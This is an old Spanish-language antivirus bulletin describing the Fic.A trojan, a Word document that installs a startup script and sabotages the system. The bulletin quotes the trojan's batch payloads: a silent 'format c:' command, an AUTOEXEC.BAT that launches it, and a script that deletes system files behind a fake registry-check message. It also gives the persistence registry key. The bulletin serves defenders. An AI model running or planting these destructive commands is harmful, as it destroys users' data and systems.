Video Soft BBS


Video Soft BBS
Menú Principal
Anti Trojans
Antivirus
Hoaxes
Subscripciones
Otro software
Artículos
Links
Sugerencias
Sobre el BBS
Direcciones
Las Noticias
Galería
Chat

Controlado desde el 19/10/97 por NedStat

VSAntivirus   
Esta página es un servicio gratuito de Video Soft BBS -
SUBSCRIBASE en nuestras listas de correo.
Es usted nuestro visitante número  desde el 12 de agosto de 1996

Trojan: Fic.A.Trojan. Un documento de Word que formatea y borra
 
VSantivirus No. 210 - Año 5 - Sábado 3 de febrero de 2001

Nombre: Fic.A.Trojan
Tipo: Caballo de Troya
Alias: W97M/Fic.A, VBS/Fic.A:Intended

Fic.A llega en la forma de un documento de Word, el que al ser abierto, se copia a si mismo como C:\WINDOWS\SYSTEM\SITES.DOC. No es un virus, puesto que no infecta ni a NORMAL.DOT ni a ningún otro documento.

También crea un archivo de Visual Basic Script en C:\WINDOWS\SYSTEM32.VBS, y modifica el registro para poder ejecutarse en cada reinicio de Windows:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
WinVBS = C:\Windows\System32.vbs

Este script intenta actuar como un gusano de e-mail, y enviarse a través del Microsoft Outlook. Sin embargo, por un error en su código, esto no funciona.

Fic.A también crea el archivo C:\WINDOWS\REG.BAT, el cuál contiene los comandos para formatear la unidad "C:\":

@echo off
ctty nul
format c: /autotest /q /u
Done!!

También elimina el archivo C:\AUTOEXEC.BAT para crear su propio AUTOEXEC.BAT, el cuál ejecutará al archivo REG.BAT anterior:

@echo off
cd ..\windows
reg.bat

El virus tiene previstas que estas acciones ocurran el 1 o el 29 de cada mes. Un error en su código causa que esto ocurra cada vez que el documento sea abierto. Esto significa que reemplazará el AUTOEXEC.BAT original por uno propio, el cuál eliminará archivos específicos del sistema:

@echo off
echo Windows Registry Checking....
echo Started checking registry...
del C:\Windows\Command\Ansi.sys
del C:\Windows\Command\attrib.exe
del C:\Windows\Command\Bootdisk.bat
del C:\Windows\Command\Display.sys
del C:\Windows\Command\Keyboard.sys
del C:\Windows\System\Wsock32.dll
del C:\Windows\System\Wsock2.vxd
del C:\Windows\System\Vmm32.vxd
echo No errors found !

El documento también despliega la siguiente ventana de mensajes:

Microsoft Word
Unable to open the current document. The problem may be connected to kernel32.dll
[   OK   ]

Cuando se pulsa en el botón OK, el documento es cerrado. Además, el ítem "Acerca de Microsoft Word" del menú de ayuda de Word, desplegará el siguiente mensaje:

Microsoft Word
This program performed an ilegal operation at 0x02338288:0x0001002
[  OK  ]

Fuente: Computer Associated

 

Copyright 1996-2001 Video Soft BBS